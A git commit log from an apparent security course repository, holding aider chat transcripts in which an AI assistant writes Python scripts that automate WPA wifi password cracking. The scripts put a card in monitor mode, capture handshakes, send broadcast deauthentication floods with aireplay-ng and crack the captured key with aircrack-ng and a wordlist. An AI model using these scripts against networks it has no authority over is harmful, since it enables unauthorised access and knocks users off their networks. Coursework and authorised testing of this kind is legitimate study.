david/gensec-westgate-djw2
Archived
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
59 Commits 1 Branch 0 Tags 1,004 KiB
6767b5f55d
Commit Graph

5 Commits

Author SHA1 Message Date
David Westgate
6767b5f55d aider: Fixed crack_password function to include the 'bssid' parameter for password cracking. 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gpt4/app.py

ASSISTANT: Please add the file `hw7/gpt4/app.py` to the chat so I can proceed with the implementation.

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected wifi network BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/gpt4/app.py

ASSISTANT: Here is the implementation for the requested Python application:

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
=======
import os
import subprocess
import threading

def run_command(command):
    """Run a shell command with sudo and return the output."""
    result = subprocess.run(['sudo'] + command, capture_output=True, text=True)
    return result.stdout

def change_mode(interface, mode):
    """Change the mode of the wifi interface."""
    run_command(['ifconfig', interface, 'down'])
    run_command(['iwconfig', interface, 'mode', mode])
    run_command(['ifconfig', interface, 'up'])

def start_monitor_mode(interface):
    """Start monitor mode on the specified interface."""
    run_command(['airmon-ng', 'start', interface])

def stop_monitor_mode(interface):
    """Stop monitor mode on the specified interface."""
    run_command(['airmon-ng', 'stop', interface])

def capture_handshake(interface, bssid, channel):
    """Capture the handshake for the specified BSSID."""
    run_command(['airodump-ng', '--bssid', bssid, '--channel', channel, '-w', 'capture', interface])

def deauthenticate(interface, bssid, client):
    """Deauthenticate a client to capture the handshake."""
    run_command(['aireplay-ng', '--deauth', '0', '-a', bssid, '-c', client, interface])

def crack_password(cap_file, wordlist):
    """Crack the password using aircrack-ng."""
    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
    return result

def main():
    interface = input("Enter the name of your wifi interface: ")
    bssid = input("Enter the BSSID of the target network: ")
    channel = input("Enter the channel of the target network: ")
    wordlist = input("Enter the path to your wordlist: ")

    # Change to monitor mode
    change_mode(interface, 'monitor')
    start_monitor_mode(interface)

    # Capture handshake
    capture_thread = threading.Thread(target=capture_handshake, args=(interface, bssid, channel))
    capture_thread.start()

    # Deauthenticate clients
    deauth_thread = threading.Thread(target=deauthenticate, args=(interface, bssid, 'FF:FF:FF:FF:FF:FF'))
    deauth_thread.start()

    capture_thread.join()
    deauth_thread.join()

    # Crack password
    password = crack_password('capture-01.cap', wordlist)
    print(f"The password is: {password}")

    # Change back to managed mode
    stop_monitor_mode(interface)
    change_mode(interface, 'managed')

if __name__ == "__main__":
    main()
>>>>>>> REPLACE
```

USER:
# Fix any errors below, if possible.

## Running: flake8 --select=E9,F821,F823,F831,F406,F407,F701,F702,F704,F706 --show-source hw7/gpt4/app.py

hw7/gpt4/app.py:34:64: F821 undefined name 'bssid'
    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
                                                               ^

## See relevant line below marked with █.

/home/kali/Documents/djw2/gensec/gensec-westgate-djw2/hw7/gpt4/app.py:
...⋮...
 31│
 32│def crack_password(cap_file, wordlist):
 33│    """Crack the password using aircrack-ng."""
 34█    result = run_command(['aircrack-ng', '-w', wordlist, '-b', bssid, cap_file])
 35│    return result
 36│
 37│def main():
...⋮...

ASSISTANT: To fix the error, we need to pass the `bssid` parameter to the `crack_password` function. Here are the necessary changes:

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
def crack_password(cap_file, wordlist):
=======
def crack_password(cap_file, wordlist, bssid):
>>>>>>> REPLACE
```

hw7/gpt4/app.py
```python
<<<<<<< SEARCH
    password = crack_password('capture-01.cap', wordlist)
=======
    password = crack_password('capture-01.cap', wordlist, bssid)
>>>>>>> REPLACE
```
 2024-05-30 13:59:52 -07:00
David Westgate
7dde8a9e64 Added functions to change wifi interface mode, start/stop monitor mode, capture handshake, deauthenticate clients, and crack password using aircrack-ng. 2024-05-30 13:59:52 -07:00
David Westgate
1cb09832a3 aider: Added a python application to assist in wifi penetration testing. 
# Aider chat conversation:

USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected
wifi network BSSID and returning the plaintext password.

This python application should use a combination of shell tools assumed to be on the users linux system, including but not limite
d to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

Operations may be run sequentially, or in parallel using multi-threading

As needed, the use of shell tools should utilize sudo capabilities

As needed, the application can change the state of the users wifi interface between managed and monitor mode

Save this to hw7/prompt0/app.py

ASSISTANT: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface: str) -> None:
    """
    Change the given interface to monitor mode.
    """
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface: str) -> None:

USER: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface: str) -> None:
    """
    Change the given interface to monitor mode.
    """
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface: str) -> None:

^^^ Incomplete SEARCH/REPLACE block.

ASSISTANT: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time

def change_to_monitor_mode(interface: str) -> None:
    """
    Change the given interface to monitor mode.
    """
    subprocess.run(["sudo", "airmon-ng", "start", interface])

def change_to_managed_mode(interface: str) -> None:
    """
    Change the given interface to managed mode.
    """
    subprocess.run(["sudo", "airmon-ng", "stop", interface])

def get_bssid(essid: str) -> str:
    """
    Get the BSSID of the given ESSID.
    """
    process = subprocess.Popen(["sudo", "iwconfig"], stdout=subprocess.PIPE)
    output, error = process.communicate()
    output = output.decode("utf-8")
    match = re.search(r"ESSID:\"({})\"".format(essid), output)
    if match:
        return match.group(1)
    else:
        return None

def capture_handshake(bssid: str, interface: str) -> None:
    """
    Capture the handshake of the given BSSID.
    """
    subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", "6", "-w", "capture", interface], stdout=subprocess.PIPE)
    time.sleep(5)
    subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
    time.sleep(10)
    subprocess.run(["sudo", "killall", "airodump-ng"])

def crack_handshake(capture_file: str, wordlist: str) -> str:
    """
    Crack the handshake in the given capture file.
    """
    process = subprocess.Popen(["sudo", "aircrack-ng", "-w", wordlist, capture_file], stdout=subprocess.PIPE)
    output, error = process.communicate()
    output = output.decode("utf-8")
    match = re.search(r"KEY FOUND! \[(.*)\]", output)
    if match:
        return match.group(1)
    else:
        return None

if __name__ == "__main__":
    essid = input("Enter the ESSID: ")
    interface = input("Enter the interface: ")
    wordlist = input("Enter the path to the wordlist: ")

    change_to_monitor_mode(interface)
    bssid = get_bssid(essid)
    if bssid:
        print(f"BSSID: {bssid}")
        capture_handshake(bssid, interface)
        password = crack_handshake("capture-01.cap", wordlist)
        if password:
            print(f"Password: {password}")
        else:
            print("Password not found.")
    else:
        print("ESSID not found.")

    change_to_managed_mode(interface)
>>>>>>> REPLACE
```
 2024-05-30 13:08:10 -07:00
David Westgate
598cb778d5 update readme, gitignore 2024-05-29 16:37:18 -07:00
David Westgate
aac3eb1153 initial commit for hw7 2024-05-27 10:53:13 -07:00